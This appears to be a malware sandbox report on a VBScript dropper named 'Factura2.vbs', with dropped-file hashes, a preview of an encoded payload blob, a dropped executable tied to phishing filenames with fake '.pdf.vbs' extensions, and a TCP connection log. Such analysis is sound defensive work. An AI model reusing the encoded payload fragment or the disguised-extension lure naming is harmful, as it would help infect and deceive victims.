                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):11608
                                                                      Entropy (8bit):4.886255615007755
                                                                      Encrypted:false
                                                                      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                      MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                      SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                      SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                      SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg0c4grn.x0c.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxhyeiht.4sr.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qfwglr.siy.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Roaming\Merogastrula.Bes

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):456672
                                                                      Entropy (8bit):5.944710967318808
                                                                      Encrypted:false
                                                                      SSDEEP:12288:zpKAtxvfjhHfQ0DE4sTvmmkbRGghuknmLo:zplBDE4sTemb8voo
                                                                      MD5:B87615809283894248FD746A584E882A
                                                                      SHA1:A59B42A75AC0530FCFFEB06E182A22BDC502B0A2
                                                                      SHA-256:4928CBD912FE97D2A6EC89742281AAFECCA616404D2B38AF09F4A389D58608CD
                                                                      SHA-512:BBF1AC55820C8F347AF346A038052DF2B6B0A217567B55F960E0340964816743BA5FF6DDE308B33FC00BD2A94D8085DDE8AC6D215FB6FA1932BA866D3677BB8C
                                                                      Malicious:false
                                                                      Preview:6wIBGHEBm7uPHB4A6wLEl+sC8BIDXCQEcQGbcQGbueVHxndxAZvrAj9wgfHNwckLcQGb6wIQ9YHxKIYPfOsCqHhxAZvrAr/VcQGbutql7M7rAmfY6wL0NesCe9NxAZsxynEBm+sC8m+JFAtxAZvrAuWy0eJxAZvrAqTOg8EE6wIGgesCByqB+TGWaAR8ynEBm+sCluCLRCQE6wJEdusCEyiJw3EBm+sChK2Bw4wqSwPrAv+EcQGbuv2iFJlxAZtxAZuB8uyEfSNxAZvrAjDEgfIRJmm66wIMxnEBm3EBm3EBm3EBm+sCvAqLDBBxAZvrAqeciQwTcQGbcQGbQusCTKNxAZuB+jjQBAB11nEBm+sC1A6JXCQM6wLwEnEBm4HtAAMAAOsC5M9xAZuLVCQI6wLA8OsC3BmLfCQE6wI90XEBm4nrcQGb6wJJs4HDnAAAAOsCaBhxAZtT6wKJTOsCHkdqQOsCC85xAZuJ6+sCdA/rAr1Bx4MAAQAAAMCJBOsCBTvrAhvWgcMAAQAAcQGbcQGbU3EBm3EBm4nr6wIimesCMAOJuwQBAABxAZtxAZuBwwQBAADrApWC6wJKSlPrAodO6wInUmr/cQGb6wJM8YPCBesCwKrrAs6wMfZxAZtxAZsxyXEBm+sCaXiLGnEBm3EBm0HrAnbP6wLymzkcCnXy6wLzfusCYmtGcQGbcQGbgHwK+7h13HEBm3EBm4tECvxxAZtxAZsp8HEBm3EBm//S6wIvIXEBm7o40AQAcQGbcQGbMcDrAmo96wIIUYt8JAzrArFm6wKtWIE0B73EAaFxAZvrAuoUg8AEcQGbcQGbOdB15XEBm3EBm4n76wLzA3EBm//XcQGbcQGbhBzq6yOGBegzvg+t0kX2TMaw/JZW8OzqBbTRKIHE0RARcCPiEkqiTxdaQ6X0SnuvsauAVlC/dVyKLzVM9nxxcTT4AXEMaLWD/muPAlNuiER6gay8zjAIIPhpYiWJeYDMEEeF

                                                                      C:\Users\user\AppData\Roaming\newfile\newfile.exe

                                                                      Download File
                                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):516608
                                                                      Entropy (8bit):6.035530871194082
                                                                      Encrypted:false
                                                                      SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                      MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                      SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                      SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                      SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: APR 20204 RFQ .xlsx.vbs, Detection: malicious, Browse
                                                                      • Filename: RFQ_2414976#U00b7pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: FACT AZUR TJ .pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: RFQ_.vbs, Detection: malicious, Browse
                                                                      • Filename: 58826828#U00b7pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: 2024-APR salary payroll confirm .pdf.vbs, Detection: malicious, Browse
                                                                      • Filename: UNLP-9004898-Oferta#U00b7pdf.vbs, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:ASCII text, with CRLF line terminators
                                                                      Entropy (8bit):5.255552704639947
                                                                      TrID:
                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                      File name:Factura2.vbs
                                                                      File size:215'511 bytes
                                                                      MD5:9500105068ac091471491a1a7c9065c2
                                                                      SHA1:f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
                                                                      SHA256:ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
                                                                      SHA512:c7e8cde3c01da28dbcb32298c6f89353a1c39beb64fe83e33c69f0d45a03596da4a4404a3df2603ce34a7077d112d71dc94bf7f490cc3596e5bf0b5ede14180d
                                                                      SSDEEP:6144:uYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfxqAe:j2dO9IT
                                                                      TLSH:B12418F09F0B36199F4B3EDAAC6445928AF58195051238B5AAD817ECB383D2CD3FDD18
                                                                      File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb

                                                                      File Icon

                                                                      Icon Hash:68d69b8f86ab9a86

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 18, 2024 10:10:57.627794027 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.627847910 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.627942085 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.636426926 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.636442900 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.869065046 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.869343996 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.870598078 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.870672941 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.876621962 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.876630068 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.877032995 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:57.889044046 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:57.932145119 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:58.090862036 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:58.090950012 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:58.090979099 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:58.091078043 CEST4434970064.233.185.138192.168.2.6
                                                                      Apr 18, 2024 10:10:58.091130972 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:58.094398022 CEST49700443192.168.2.664.233.185.138
                                                                      Apr 18, 2024 10:10:58.203033924 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.203053951 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:58.203125954 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.203583956 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.203594923 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:58.429476976 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:58.429650068 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.433578014 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.433587074 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:58.433978081 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:58.435235023 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:58.480123997 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.089297056 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.089529991 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.095964909 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.096136093 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.110466003 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.110565901 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.117536068 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.171978951 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.171998024 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.194143057 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.194376945 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.194396973 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.198882103 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.198964119 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.198982954 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.205080032 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.205152988 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.205172062 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.212066889 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.212152958 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.212174892 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.219470978 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.219559908 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.219567060 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.226542950 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.226650953 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.226656914 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.233913898 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.234028101 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.234051943 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.240892887 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.241018057 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.241025925 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.247831106 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.247908115 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.247914076 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.254287004 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.254378080 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.254384041 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266303062 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266345978 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266377926 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.266386032 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.266426086 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.271469116 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.277921915 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.277997017 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.278023005 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.278031111 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.278070927 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.298791885 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302009106 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302072048 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302087069 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.302108049 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.302151918 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.308722973 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315416098 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315479994 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315618038 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.315638065 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.315700054 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.321818113 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327712059 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327786922 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327866077 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.327886105 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.327933073 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.333372116 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338794947 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338852882 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338915110 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.338937044 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.338982105 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.343323946 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.349771023 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.349984884 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.350003958 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.352485895 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.352550030 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.352556944 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.357593060 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.357650042 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.357656002 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.363370895 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.363436937 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.363456011 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.368586063 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.368645906 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.368665934 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.373344898 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.373409033 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.373415947 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.378134966 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.378204107 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.378210068 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.382258892 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.382311106 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.382318020 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.387809038 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.387864113 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.387870073 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.392344952 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.392402887 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.392409086 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.396528959 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.396612883 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.396619081 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.400789022 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.400851011 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.400856972 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.405208111 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.405283928 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.405289888 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410932064 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410967112 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.410990000 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.410995007 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.411040068 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.415162086 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418030024 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418107033 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418128967 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.418134928 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.418174028 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.420723915 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.420819998 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.420871019 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.420876980 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.423533916 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.423614979 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.423621893 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.426162004 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.426218987 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.426224947 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.428827047 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.428879023 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.428884983 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.431536913 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.431588888 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.431595087 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.434278011 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.434340000 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.434346914 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.436919928 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.436985970 CEST49701443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:10:59.436991930 CEST4434970174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:10:59.439666033 CEST4434970174.125.138.132192.168.2.6
